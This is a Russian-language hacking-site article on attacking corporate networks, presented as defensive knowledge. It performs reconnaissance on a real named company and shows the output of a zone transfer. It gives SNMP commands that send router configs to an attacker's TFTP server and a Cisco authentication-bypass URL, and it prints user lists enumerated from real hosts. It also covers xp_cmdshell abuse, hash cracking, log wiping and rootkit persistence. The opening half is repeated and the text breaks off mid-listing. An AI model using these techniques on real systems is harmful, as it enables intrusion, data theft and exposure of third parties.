Анализ методик атак на корпоративные сети. — HackZona.Ru
Анализ методик атак на корпоративные сети.
Анализ методик атак на корпоративные сети.
Тип статьи:
Со старой ХакЗоны.
Источник:
Здравствуйте уважаемые читатели!
Как известно, наиболее эффективной защитой от потенциального (и не только) нападения является знание методик проведения этих атак. В данной статье я попытаюсь проанализировать данный аспект.
Во-первых, определим кто и по каким целям проводит атаки:
1 — Червь, робот.
Данный субъект не опасен, так как работает по простому алгоритму, а именно: производит сканирование сети на уязвимые компьютеры и пытается их заразить.
Уровень его опасности, при наличии грамотно сконфигурированной сети, минимален. Цели как таковой не имеет.
Пример такого червя — MSBlast.
2 — «Скрипт Кидди».
Данный субъект не особо отличается от первого в методах работы. Тупо сканирует сеть на «дырявые» компьютеры и пытается их сломать.
Уровень опастности маленький, чуть повыше обычного червя. Цели — использование компьютеров для рыссылки спама, либо создание «ботнета» для проведения DDOS атак.
Если атакует сайт, то обычно для проведения deface. Некоторые атакуют специфические компьютеры на диалап соединениях, чтобы украсть
логинпароль для доступа в интернет.
Пример такого человека — возьмите любой дефейс и посмотрите на greets`ы.
3 — «Энтузиаст»
Данный субъект, в отличае от первых двух, представляет средний уровень опасности. Это, обычно, люди, хорошо разбирающиеся в
администрировании различных операционных систем, и знающие основы безопасности. Представляют опастность тем, что в отличие от «скрипт
кидов» обладают большей «творческой» способностью. Обычно у них нету конкретных целей, а «взломы» производятся из любопытства. Например, «друг попросил посмотреть или „интересно стало“.
Примером такого человека может служить Андриан Ламо, который взламывал крупные компании, а затем сообщал им об этом.
4 — »Корпоративный шпион."
Данные субъекты наиболее опасны. В отличае от первых трех у них есть конкретная цель, опыт и средства для проведения атаки. В виде цели
служит обычно какая-либо специальная информация компании (разработки или база клиентов). Обычно они проводят «комплексный» анализ
безопасности вашей сети. Пытаются найти малейшие прорехи в безопасности и попытаться как-либо (как только можно!) их использовать.
Поскольку корпоративный шпион, по моему мнению, наиболее потенциальный и технически опасный противник, постараемся проанализировать его
методы атак.
Вначале проводится стандартная «лобовая» атака. Для этого надо знать собственно говоря «что атаковать».
Обычно у жертвы имеется свой вебсайт ;)
Возьмем для примера www.su29.ru
Чаще всего, сайт жертвы — самая хорошо защищенная «точка», так как она расчитана на «публику» и поэтому администратор заботится о её безопасности в первую очередь.
Первым делом нам необходимо узнать IP адрес этого сайта. Обычно такие сайты либо находятся в собственном IP диапазоне компании, либо на хостинге
какого-либо крупного хостинг провайдера. Например сайт майкрософта находится у akamai.
bash-2.05b$ host www.su29.ru
www.su29.ru has address 81.200.0.48
bash-2.05b$
Вот теперь мы получили адрес жертвы. Что теперь? Нам необходимо узнать, что это за IP адрес, кому принадлежит, какой сети и после этого решать, что делать дальше.
bash-2.05b$ whois 81.200.0.48
[Querying whois.ripe.net]
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 81.200.0.0 — 81.200.1.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
admin-c: DZ191-RIPE
tech-c: VG43-RIPE
status: ASSIGNED PA
mnt-by: SU29-MNT
mnt-routes: RU-CORBINA-MNT
notify: [email protected]
changed: [email protected] 20021002
source: RIPE
… etc
Как мы видим, подсеть, принадлежащая компании, 81.200.0-1.* и сайт находится в этом же диапазоне. Что теперь? А это еще не все. У
компании, возможно, имеются и другие IP диапазоны. Надо посмотреть информацию о домене. В первую очередь, нас интересуют MX и NS записи.
Что это такое?
MX — The mail exchanger. Когда мы отсылаем письмо, например, на [email protected] почтовый сервер узнает, какой почтовый сервер отвечает за
домен @su29.ru. Таким образом, MX запись соответствует почтовому серверу компании.
NS — The name server for the named zone. Когда мы делаем resolve домена третьего уровня и ниже, например, admin.s29.ru общение
происходит с DNS сервером, отвечающим за домен su29.ru адрес этого сервера — NS запись.
Ну чтож, попробуем снять эти записи.
bash-2.05b$ host -t mx su29.ru
su29.ru mail is handled by 20 smtp.su29.ru.
bash-2.05b$ host -t ns su29.ru
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
bash-2.05b$
Узнаем их IP адреса.
bash-2.05b$ host ns.su29.ru.
ns.su29.ru has address 81.200.0.1
bash-2.05b$ host ns3.su29.ru.
ns3.su29.ru has address 213.221.13.9
bash-2.05b$ host smtp.su29.ru
smtp.su29.ru has address 81.200.3.6
bash-2.05b$
smtp.su29.ru находится в диапазоне, «вышедшем» за рамки, которые нам дал whois.
На его IP адрес whois нам выдал следущее.
inetnum: 81.200.3.0 — 81.200.4.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
Как видно, диапазон находится рядом.
inetnum: 213.221.13.0 — 213.221.13.255
netname: SOVINTEL-ROSPROMBANK
descr: OOO «Rosprombank» Ltd
descr: 35 bld.2 Miasnitskaya ul
descr: Moscow 101000 Russia
country: RU
А вот в этом диапазоне находится сервер ns3.su29.ru
Скорее всего, это Secondary DNS сервер.
Теперь нам бы очень пригодилось знать, что и где находится у данной компании. А еще может и дополнительные IP адреса...
У днс есть такая вещь как «Zone Transfer». Она пересылает все данные о доменах с DNS сервера. Ну что же, попробуем указать DNS серверы
нашего подопытного и снять с них эти данные.
(чтобы листинг получился более красивым я добавил ns.su29.ru в /etc/resolv и сделал host -l su29.ru)
bash-2.05b$ host -l su29.ru
su29.ru SOA ns.su29.ru. hostmaster.su29.ru. 2004081600 28800 7200 604800 86400
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
su29.ru has address 81.200.0.48
su29.ru mail is handled by 20 smtp.su29.ru.
lefutur-213.su29.ru has address 81.200.7.213
lefutur-193.su29.ru has address 81.200.7.193
vpn-86.su29.ru has address 81.200.1.86
lefutur-214.su29.ru has address 81.200.7.214
lefutur-194.su29.ru has address 81.200.7.194
vpn9-1.su29.ru has address 81.200.9.1
vpn-87.su29.ru has address 81.200.1.87
lefutur-215.su29.ru has address 81.200.7.215
lefutur-195.su29.ru has address 81.200.7.195
vpn9-2.su29.ru has address 81.200.9.2
vpn-90.su29.ru has address 81.200.1.90
vpn-88.su29.ru has address 81.200.1.88
auth.su29.ru has address 81.200.0.48
...etc
чтож, достаточно интересно! Мы видим IP адреса определенных компьютеров и их имена, по которым можно определить их функцию в сети данной
компании. Чем это опасно? ну для начала тем, что так можно найти специальные сервера компании. Например ВПН сервер (VPN, virtual private
network), которым пользуются работники фирмы для доступа в корпоративную сеть или же, например, прокси серверы компании. Ну и, соответственно,
новые IP адреса, диапазоны и так далее — тоесть потенциальные «жертвы».
В принципе, насчёт разведки этого хватит. Добавлю только, что еще есть такой сайт как www.fixedorbit.com/search.htm
Принцип работы я описывать не буду. Зайдите и посмотрите сами. По данным, таким как ASN, домен или просто название фирмы, вы сможете снять данные об IP диапазонах, принадлежащих данной фирме.
Теперь, собственно, перейдем к самой атаке. Для начала определимся, что мы можем найти на этих IP диапазонах:
(1) серверы.
(2) рабочие станции.
(3) сетевое оборудование.
(4) другое оборудование.
Серверы бывают в основном либо на базе WinNT (в том числе 2k,2003 и все остальные), либо на базе какого либо из UNIX`ов (чаще всего
встречаются Solaris от Sun Microsystems, потом FreeBSD и конечно же Linux). Как правило, эти компьютеры настроены
относительно грамотно, так как за ними следит администратор. Так что тут всё зависит от его компетентности и объективных
причин (таких как, например, лень). Так же обычно на них стоят какие либо сервисы, к которым открыт доступ и которые представляют из себя
потенциальную «уязвимость».
Рабочие станции — почти всегда на базе WinNT, реже на Win98. На UNIX`ах встречается достаточно редко, настолько
редко что можно сказать что не встречается вообще ;-).Как правило, на них не стоит каких-либо дополнительных приложений
или сервисов. За этими машинами администратор не так активно следит, как за серверами, поэтому часто на таких компьютерах оказываются
такие элементарные вещи, как логин равный паролю, или же просто не стоит патч на уязвимость, о которой уже известно без малого пару лет...
Сетевое оборудование — обычно это роутеры фирмы Cisco. По крайней мере, рассказывать я буду о них, так как от всего
остального толку не особо много. Хотя тут всё зависит от фантазии «злоумышленника»...
Другое оборудование — обычно всякие датчики, индикаторы или сетевые принтеры. Толку от них тоже не особо много.
А теперь я расскажу, как это всё злоумышленник может использовать.
Начну в обратном порядке, по мере возрастания «возможностей».
Другое оборудование — толку от него обычно не особо много, а если и есть — то особо специфический. Например, можно найти машину с
security камерами, показывающими обзор помещения или сетевой принтер. Если от первого еще будет какая-то польза, если вы,
например, хотите «ограбить» данную фирму в «реале» и следить за объектами в ней. То от принтера максимум что вы сможете сделать —
так это напечатать в духе «скрипт кидов» например «я вас поломал, гыгыгы». От данного оборудования есть смысл только если на нем вы
можете как-либо скачать конфигурацию и «вытащить» оттуда loginpassword на администратирование данного устройства, так как эти
loginpassword можно будет попробовать на других компьютерах или устройствах, от которых больше пользы. А учитывая, что администратор
тоже человек, и ему очень хочется поставить везде один и тот же пароль… Ну вы поняли идею. Описывать способы «взлома» я не буду так
как таких устройств большое множество, а встречаются они довольно не часто.
Сетевое оборудование — если это какой-либо тупой «свитч» левой компании то от него толку будет не больше чем от того что написано
абзацем выше. Но если же это более менее «серьезный» роутер от Cisco или кого-либо еще, перед вами открываются большие возможности. Во
первых если вы имеет к такой штуке доступ — и на ней есть telnet то вы можете организовать за его счет «туннелинг» спецальной
программой или просто делать telnet на компьютеры, находящиеся внутри сети фирмы. Вы также можете поднять свой собственный VPN в
своей виртуальной сети и сделать NAT (network address translation) из неё, тем самым вы будете работать с IP адреса роутера. А как
правило, если роутер находится в сети компании (особенно внутренней), он имеет гораздо больший «доступ» к самой сети и в том числе к другим
компьютерам, которые потенциально можно взломать. (Как это сделать конфигурацию не превожу, так как это займет много времени и не
относится к теме статьи). На роутере также можно организовать «снифинг» пакетов, проходящих через него. На роутерах фирмы Cisco это
делается показыванием буффера роутера (командый show buffers) или включением дебага проходящих TCP пакетов (debug ip packet dump),
после этого содержимое пакетов будет выводится на монитор (чтобы увидеть это, надо набрать terminal monitor (включает режим монитора)).
Учтите, если роутер интенсивно используется такой режим, произведет на него DOS. Есть и более технологичные методы снифинга, такие как
пропускание всего трафика через «левый» компьютер со снифером, но это увеличивает конечный пинг и делает «систему» более заметной для
администратора. Взлом роутера фирмы Cisco в основном производится тремя путями
(1) через SNMP
(2) через «сервисы»
(3) через подбор пароля
SNMP — Simple Network Management Protocol. Как видно из названия, это простой протокол для сетевого управления. Сервис этот находится
на 161 порту и работает по UDP. Особенности работы описывать не буду — расскажу только что мы можем с помощью него поиметь. У SNMP есть чтото
вроде «аутентификации» — это community string. Есть два типа community. Это либо READ-ONLY, либо READ-WRITE. С первой мы можем считать
информацию с роутера, определенные данные. Например, название роутера, его uptime и т.д. Бывает полезно например определить «имя»
роутера и попробывать его как READ-WRITE community или как пароль на роутер — иногда проходит. C READ-WRITE community вы как правило
имеете возможность изменять некоторые значения в конфигурации роутера, а также например дать роутеру команду залить его конфигурацию по TFTP
на определенный сервер.
По умолчанию READ-ONLY community это «public» а READ-WRITE это «private».
Так же многие Cisco роутеры имеют «встроенные» community. Это «cable-docsis» и «ILMI».
Вот пример как это выглядит:
bash-2.05b$ snmpget 201.194.164.2 public .1.3.6.1.2.1.1.5.0
system.sysName.0 = OCTET STRING: «lannet-gw»
bash-2.05b$
snmpget программа входит в пакет программ для работы с SNMP. Идентификатор объекта .1.3.6.1.2.1.1.5.0 — это system.sysName.0 — в ней
записано значение «имя роутера». Используя snmpset (если бы community была с правом записи) мы могли бы записать свое имя роутеру,
только это бы нам ничего не дало.
DOWNLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.55.$.$.$.$ s «cisco1.cfg»
UPLOAD: snmpset #.#.#.# ILMI .1.3.6.1.4.1.9.2.1.53.$.$.$.$ s «cisco1.cfg»
вот так можно заливать и сливать конфиг файл роутера на TFTP сервер. Там где #.#.#.# — это IP адрес роутера, а $.$.$.$ — IP адрес
TFTP сервера (учтите под UNIX`ами надо в директории TFTP сервера создать файл с именем cisco1.cfg и присвоить ему chmod a+w)
Вот краткий список SNMP идентификаторов (самые полезные на мой взгляд)
.1.3.6.1.2.1.1.5.0 — Имя компьютера
.1.3.6.1.2.1.1.1.0 — Описание системы
.1.3.6.1.2.1.4.21.1.1 — Таблица роутинга
.1.3.6.1.2.1.6.13 — NETSTAT (используя SNMPWALK)
.1.3.6.1.2.1.1.3 — UPTIME.
Также SNMP часто встречается и на других компьютерах, в том числе UNIX и NT. В UNIX`е максимум интересного что в них можно сделать — это
узнать версию OS через «Описание системы» и получить список активных соединений. В NT у SNMP намного больше «полезных» функций.
Через SNMPWALK можно получить список юзеров на компьютере используя Object ID .1.3.6.1.4.1.77.1.2.25
Например
bash-2.05b$ snmpwalk 63.224.248.114 public .1.3.6.1.4.1.77.1.2.25
enterprises.77.1.2.25.1.1.4.100.101.108.120 = OCTET STRING: «delx» Hex: 64 65 6C 78
enterprises.77.1.2.25.1.1.4.104.111.109.101 = OCTET STRING: «home» Hex: 68 6F 6D 65
enterprises.77.1.2.25.1.1.4.119.111.114.107 = OCTET STRING: «work» Hex: 77 6F 72 6B
enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = OCTET STRING: «Guest»
enterprises.77.1.2.25.1.1.6.67.97.109.101.114.97 = OCTET STRING: «Camera»
enterprises.77.1.2.25.1.1.6.75.101.108.108.105.77 = OCTET STRING: «KelliM»
enterprises.77.1.2.25.1.1.7.73.110.101.116.75.105.116 = OCTET STRING: «InetKit»
enterprises.77.1.2.25.1.1.8.69.120.99.104.97.110.103.101 = OCTET STRING: «Exchange»
enterprises.77.1.2.25.1.1.9.49.83.81.76.65.100.109.105.110 = OCTET STRING: «1SQLAdmin»
enterprises.77.1.2.25.1.1.9.74.111.104.110.82.97.122.111.114 = OCTET STRING: «JohnRazor»
enterprises.77.1.2.25.1.1.10.49.69.120.99.104.97.110.103.101.49 = OCTET STRING: «1Exchange1»
enterprises.77.1.2.25.1.1.10.77.105.107.101.77.117.110.115.111.110 = OCTET STRING: «MikeMunson»
enterprises.77.1.2.25.1.1.11.65.109.98.101.114.72.97.110.115.111.110 = OCTET STRING: «AmberHanson»
enterprises.77.1.2.25.1.1.11.71.114.101.103.71.97.114.108.105.99.107 = OCTET STRING: «GregGarlick»
enterprises.77.1.2.25.1.1.12.65.110.100.114.101.97.82.105.115.110.101.114 = OCTET STRING: «AndreaRisner»
enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = OCTET STRING: «Administrator»
enterprises.77.1.2.25.1.1.13.82.105.99.107.84.101.109.112.108.101.116.111.110 = OCTET STRING: «RickTempleton»
enterprises.77.1.2.25.1.1.14.76.68.65.80.95.65.78.79.78.89.77.79.85.83 = OCTET STRING: «LDAP_ANONYMOUS»
enterprises.77.1.2.25.1.1.15.83.81.76.65.103.101.110.116.67.109.100.69.120.101.99 = OCTET STRING: «SQLAgentCmdExec»
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «IUSR_MULTISECURE1»
enterprises.77.1.2.25.1.1.17.73.85.83.82.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: «IUSR_MULTISECURE2»
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «IWAM_MULTISECURE1»
enterprises.77.1.2.25.1.1.17.73.87.65.77.95.77.85.76.84.73.83.69.67.85.82.69.50 = OCTET STRING: «IWAM_MULTISECURE2»
enterprises.77.1.2.25.1.1.19.77.66.83.68.77.48.95.77.85.76.84.73.83.69.67.85.82.69.49 = OCTET STRING: «MBSDM0_MULTISECURE1»
bash-2.05b$
Как мы видим достаточно много всяких разных юзеров, пароли которых не мешает проверить на всякие «qwerty» или «login»=«password».
У роутеров Cisco было в основном две серьезных уязвимости. Это в сервисе finger (можно получить exec доступ на
роутер), а также в сервисе HTTP (можно получить конфигурацию роутера).
Про ошибку в сервисе finger я ничего определенного сказать не могу, так как еще ни разу не удалось проэксплуатировать данную уязвимость. Складывается ощущение, что либо
это вообще какойто миф, либо это было на сверх древних роутерах. А вот второе (http bug) встречается довольно таки часто. Если мы пошлем
роутеру запрос типа ROUTER_IP_ADDRESS/level/16/exec/show/conf то обойдем всю его систему аутентификации (роутеру становится
плохо когда уровень доступа указан выше 15и (максимального)) и скачаем конфигурацию роутера.
C роутерами мы пока закончили, переходим к разбору рабочих станций и серверов на базе Windows NT.
Во-первых, как войти на компьютер на базе Windows NT? В *NT есть сервис «Server». Он по умолчанию всегда включен. Чтобы зайти на *NT
(получить доступ командной строки) нам необходимо по нетбиосу залить свою специальную программу, прописать свой специальный сервис, который
бы эту программу запускал, и запустить её. Все эти операции можно произвести на default установке Windows NT (через порты 139,445).
Как это сделать? Этим способом пользуются программы psexec.exe (www.sysinternals.com пакет утилит pstools) либо пакет DameWare Utilites
(он также позволяет получить GUI доступ к компьютеру, но учтите что этот доступ будет ПАРАЛЕЛЬНО с пользователем, что очень заметно!).
Теперь, ЧТО для этого нужно сделать? Для этого надо иметь логин и пароль с уровнем привелегий Администратора на данный компьютер. Их можно получить простым
перебором паролей по словарю на каждую из учетных записей, имеющихся на компьютере. Как получить «учетки»? Это можно сделать с помощью специального запроса по протоколу нетбиос.
bash-2.05b$ rpcclient -N 63.224.69.197 -c querydispinfo
cmd = querydispinfo
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Admin Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ea acb: 0x210 Account: Anon000 Name: Desc: Built-in account for anonymous access to the computer
...
index: 0xf RID: 0x3f7 acb: 0x210 Account: Anon013 Name: Desc: Built-in account for anonymous access to the computer
index: 0x10 RID: 0x3f8 acb: 0x210 Account: Anon014 Name: Desc: Built-in account for anonymous access to the computer
index: 0x11 RID: 0x3f9 acb: 0x614 Account: ASPNET Name: ASP.NET Machine Account Desc: Account used for running the ASP.NET
worker process (aspnet_wp.exe)
index: 0x12 RID: 0x3fb acb: 0x210 Account: bwatts Name: Bill Watts Desc: Local Backup Administrator Account
index: 0x13 RID: 0x1f5 acb: 0x615 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x14 RID: 0x3fa acb: 0x210 Account: SQLDebugger Name: SQLDebugger Desc: This user account is used by the Visual Studio
.NET Debugger
index: 0x15 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal
Services.
bash-2.05b$
либо через SNMP (способ в разделе роутеров). Также почти на всех компьютерах есть учетка
Administrator. В локализованных версиях операционной системы учетки также локализованны, например на русских компьютерах — по русски
«Администратор» и т.п. В последнее время было опубликовано большое количество различных уязвимостей в компьютерах семейства NT. Тут я описывать
ничего конкретно не буду, так как всё буквально сводится к тому чтобы «скачать эксплоит, скомпилировать, запустить и молиться».
Единственное что отмечу, многие уязвимости, например в RPC работает не только через порт 135 а например и через 1025, но многие
администраторы об этом «забывают» и закрывают только первую группу «любимых» портов (135,139,445). Также хочу отметить что довольно
часто встречаются компьютеры с MSSQL сервером на котором установлен пустой пароль на «sa» аккаунт. Если подключится к серверу с SA
аккаунта — можно выполнять команды cmd шелла через функцию «xp_cmdshell». Самая же главная уязвимость Windows NT на мой взгляд это
ненадежное хранение паролей. Они по умолчанию криптуются NTLM и дублируются LMHASH`ем. А подобрать пароль в виде LMHASH`а не просто
легко, а ОЧЕНЬ легко. Во первых скорость перебора составляет 5милионов комбинаций в секунду (на 3ghz xeon`е), во вторых пароли длиннее
7 символов разбиваются на две пары (7символов каждая), в третьих при шифровке не учитывается регистр букв. А учитывая что при шифровке не
используется SALT — можно проводить атаки типа rainbow (по таблице по приметам схожести подобрать пароль очень быстро). Как правило
сети на основе Windows NT объеденены в ДОМЕНы (Active Directory). Суть в том, что каждый компьютер подключен к одному большому
серверу(контроллеру) и проводит аутентификацию на нём. Вот эти контроллеры и являются основной целью атакующих (если имеешь доступ на контроллер
домена — владеешь всеми компьютерами в домене — легче работать).Следущей целью после контроллера домена являются компьютеры администраторов сети, так как на них может находиться
техническая документация и конфиги разных терминальных программ (например SecureCRT), либо на них можно установить сниферы или кейлогеры и тем самым достичь желаемого. После этого «заражение»
происходит и компьютеров на базе UNIX...
Теперь приступаем к разбору уязвимостей UNIXовых компьютеров. Их в основном ломают если на них стоит старый софт (например древний sshd),
методом описаным выше (через простое ворование конфигов записанных) и подбором паролей (логины пытаются узнать через finger). Если UNIX
например HP-UX с анонимным FTP сервером — можно скачать /etc/passwd и в нём будут пароли (HP-UX не знает про shadow файлы). Многие
солярисы подверженны уязвимости с TTYPROMPT переполнением. Но тут нет впринципе ничего не обычного. Администраторы любят использовать
файл «authorized_keys». Это специальный ключ позволяющий заходить на компьютер «по дружбе», тоесть не спрашивая пароля, а это не есть
хорошо… Также на UNIX`ах частенько ставят простенькие самописные программки, при этом СОВЕРШЕННО не заботясь об аспекте
безопасности. Например при выполнении одного из скриптов в списке процессов можно было увидеть логин и пароль ROOTовые на MYSQL. Еще,
если UNIX компьютер находится в NIS домене (чтото вроде аналога active directory но под юниксы) — то вы можете
получить список всех юзеров с паролям. MySQL — одно из слабых мест компьютеров на UNIX (если разумеется он стоит на нём). Во первых часто
администраторы «забывают» поставить пароль на root в MYSQL, а во вторых пароли в MYSQL шифруются довольно плохо, и возникает ситуация
схожая (хоть и в меньшей степени) с ситуацией с компьютерами на Windows NT (описано выше).
Вот вроде бы и разобрались с основными проблемами разных компьютеров и систем. Теперь же как собственно говоря происходит сама атака?
Тут все зависит от фантазии атакующего. Обычно объект «просканивает» всю сеть на стандартный набор портов, а затем смотрит результаты.
На всех роутерах, WindowsNT и UNIXах пробует применить то, что описано выше. Особенно проверяет компьютеры с портом 80 (http), так как
там могут быть разные дырявые CGI-BIN скрипты или sql-inject или XSS и много других уязвимостей. Проверяются анонимные FTP серверы на
предмет конфигов других систем, а также документаций. Затем если у него чтото получилось взломать — он трёт логи, ставит руткит
(чтобы незаметно ходить и выходить из компьютера) и пытается дальше уже с этого компьютера производить взлом, так компьютеру, находящемуся «в
корпоративной» сети, доступно как правило намного больше, чем простому пользователю из интернета. Дальше тут описывать особо нечего,
это методичный долгий процесс «внедрения». Постоянный поиск новых жертв, предпочтительно днём (больше включенных компьютеров
(надо учесть временной пояс)), проведение «серьезных атак» на внутренние сервера (обычно в выходные так как администраторы дома), и
выжидание того, что принесут «кейлоги и сниферы. После внедрения в сеть, злоумышленник обычно пытается „закрепится“ в ней, делая
»запасные" точки входа, на случай если администратор что-либо найдет.
То есть, основной упор «злоумышленник» делает на получение доступа во внутреннюю сеть фирмы, так как в ней как правило безопасность намного
ниже — потому что к ней не имеют доступ из интернета, и следовательно все системы в ней защищены намного хуже.
А что если «злоумышленнику» не получилось произвести удачную атаку на «периметр»? Тогда он начнет разрабатывать более «сложные» пути
атаки. Это например
(1) Активная атака домашних работников.
(2) Пассивная атака работников.
(3) Выжидание.
Первый способ заключается в том, чтобы сломать компьютер работника этой фирмы, пока он находится ВНЕ сети фирмы (например по модему
через провайдера или по ADSL, подключенный к интернету с домашнего компьютера). После взлома злоумышленник пытается найти логинпароль
для доступа в корпоративную сеть через VPN сервер или другую полезную информацию. Основная сложность заключается в том, чтобы его найти (такой
компьютер). Обычно его находят по логам на каких либо серверах в интернете, finger`у на компьютерах фирмы в интернете (там у логина будет
интернетовский IP адресс) и по аське (некоторые работники честно пишут где работают в «ICQ White Pages»).
Второй способ заключается в том, чтобы тоже сломать компьютер работника, но сделать это ПАССИВНЫМ методом. Тоесть завести бедолагу на
какой либо сайт или убедить запустить какую-либо программу. Сложности здесь заключаются в том, что надо иметь некоторые навыки СИ
(социальной инженерии) чтобы убедить запустить программу или зайти на сайт.
А третий способ — самый неинтересный. Это просто ждать. Ждать пока не появится новая сверх уязвимость и пока никто не успел пропатчится
— воспользоватся ею, либо ждать пока администратор совершит ошибку.
З.Ы.
Компьютеры это плохо! Используйте счёты ;-)
— Специально для HackZona.ru
Как известно, наиболее эффективной защитой от потенциального (и не только) нападения является знание методик проведения этих атак. В данной статье я попытаюсь проанализировать данный аспект.
Во-первых, определим кто и по каким целям проводит атаки:
1 — Червь, робот.
Данный субъект не опасен, так как работает по простому алгоритму, а именно: производит сканирование сети на уязвимые компьютеры и пытается их заразить.
Уровень его опасности, при наличии грамотно сконфигурированной сети, минимален. Цели как таковой не имеет.
Пример такого червя — MSBlast.
2 — «Скрипт Кидди».
Данный субъект не особо отличается от первого в методах работы. Тупо сканирует сеть на «дырявые» компьютеры и пытается их сломать.
Уровень опастности маленький, чуть повыше обычного червя. Цели — использование компьютеров для рыссылки спама, либо создание «ботнета» для проведения DDOS атак.
Если атакует сайт, то обычно для проведения deface. Некоторые атакуют специфические компьютеры на диалап соединениях, чтобы украсть
логинпароль для доступа в интернет.
Пример такого человека — возьмите любой дефейс и посмотрите на greets`ы.
3 — «Энтузиаст»
Данный субъект, в отличае от первых двух, представляет средний уровень опасности. Это, обычно, люди, хорошо разбирающиеся в
администрировании различных операционных систем, и знающие основы безопасности. Представляют опастность тем, что в отличие от «скрипт
кидов» обладают большей «творческой» способностью. Обычно у них нету конкретных целей, а «взломы» производятся из любопытства. Например, «друг попросил посмотреть или „интересно стало“.
Примером такого человека может служить Андриан Ламо, который взламывал крупные компании, а затем сообщал им об этом.
4 — »Корпоративный шпион."
Данные субъекты наиболее опасны. В отличае от первых трех у них есть конкретная цель, опыт и средства для проведения атаки. В виде цели
служит обычно какая-либо специальная информация компании (разработки или база клиентов). Обычно они проводят «комплексный» анализ
безопасности вашей сети. Пытаются найти малейшие прорехи в безопасности и попытаться как-либо (как только можно!) их использовать.
Поскольку корпоративный шпион, по моему мнению, наиболее потенциальный и технически опасный противник, постараемся проанализировать его
методы атак.
Вначале проводится стандартная «лобовая» атака. Для этого надо знать собственно говоря «что атаковать».
Обычно у жертвы имеется свой вебсайт ;)
Возьмем для примера www.su29.ru
Чаще всего, сайт жертвы — самая хорошо защищенная «точка», так как она расчитана на «публику» и поэтому администратор заботится о её безопасности в первую очередь.
Первым делом нам необходимо узнать IP адрес этого сайта. Обычно такие сайты либо находятся в собственном IP диапазоне компании, либо на хостинге
какого-либо крупного хостинг провайдера. Например сайт майкрософта находится у akamai.
bash-2.05b$ host www.su29.ru
www.su29.ru has address 81.200.0.48
bash-2.05b$
Вот теперь мы получили адрес жертвы. Что теперь? Нам необходимо узнать, что это за IP адрес, кому принадлежит, какой сети и после этого решать, что делать дальше.
bash-2.05b$ whois 81.200.0.48
[Querying whois.ripe.net]
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See www.ripe.net/ripencc/pub-services/db/copyright.html
inetnum: 81.200.0.0 — 81.200.1.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
admin-c: DZ191-RIPE
tech-c: VG43-RIPE
status: ASSIGNED PA
mnt-by: SU29-MNT
mnt-routes: RU-CORBINA-MNT
notify: [email protected]
changed: [email protected] 20021002
source: RIPE
… etc
Как мы видим, подсеть, принадлежащая компании, 81.200.0-1.* и сайт находится в этом же диапазоне. Что теперь? А это еще не все. У
компании, возможно, имеются и другие IP диапазоны. Надо посмотреть информацию о домене. В первую очередь, нас интересуют MX и NS записи.
Что это такое?
MX — The mail exchanger. Когда мы отсылаем письмо, например, на [email protected] почтовый сервер узнает, какой почтовый сервер отвечает за
домен @su29.ru. Таким образом, MX запись соответствует почтовому серверу компании.
NS — The name server for the named zone. Когда мы делаем resolve домена третьего уровня и ниже, например, admin.s29.ru общение
происходит с DNS сервером, отвечающим за домен su29.ru адрес этого сервера — NS запись.
Ну чтож, попробуем снять эти записи.
bash-2.05b$ host -t mx su29.ru
su29.ru mail is handled by 20 smtp.su29.ru.
bash-2.05b$ host -t ns su29.ru
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
bash-2.05b$
Узнаем их IP адреса.
bash-2.05b$ host ns.su29.ru.
ns.su29.ru has address 81.200.0.1
bash-2.05b$ host ns3.su29.ru.
ns3.su29.ru has address 213.221.13.9
bash-2.05b$ host smtp.su29.ru
smtp.su29.ru has address 81.200.3.6
bash-2.05b$
smtp.su29.ru находится в диапазоне, «вышедшем» за рамки, которые нам дал whois.
На его IP адрес whois нам выдал следущее.
inetnum: 81.200.3.0 — 81.200.4.255
netname: SU29CORENET
descr: SU29 Telecom ISP
descr: 6/2 Ramenki ul, Moscow, Russia
country: RU
Как видно, диапазон находится рядом.
inetnum: 213.221.13.0 — 213.221.13.255
netname: SOVINTEL-ROSPROMBANK
descr: OOO «Rosprombank» Ltd
descr: 35 bld.2 Miasnitskaya ul
descr: Moscow 101000 Russia
country: RU
А вот в этом диапазоне находится сервер ns3.su29.ru
Скорее всего, это Secondary DNS сервер.
Теперь нам бы очень пригодилось знать, что и где находится у данной компании. А еще может и дополнительные IP адреса...
У днс есть такая вещь как «Zone Transfer». Она пересылает все данные о доменах с DNS сервера. Ну что же, попробуем указать DNS серверы
нашего подопытного и снять с них эти данные.
(чтобы листинг получился более красивым я добавил ns.su29.ru в /etc/resolv и сделал host -l su29.ru)
bash-2.05b$ host -l su29.ru
su29.ru SOA ns.su29.ru. hostmaster.su29.ru. 2004081600 28800 7200 604800 86400
su29.ru name server ns.su29.ru.
su29.ru name server ns3.su29.ru.
su29.ru has address 81.200.0.48
su29.ru mail is handled by 20 smtp.su29.ru.
lefutur-213.su29.ru has address 81.200.7.213
lefutur-193.su29.ru has address 81.200.7.193
vpn-86.su29.ru has address 81.200.1.86
lefutur-214.su29.ru has address 81.200.7.214
lefutur-194.su29.ru has address 81.200.7.194
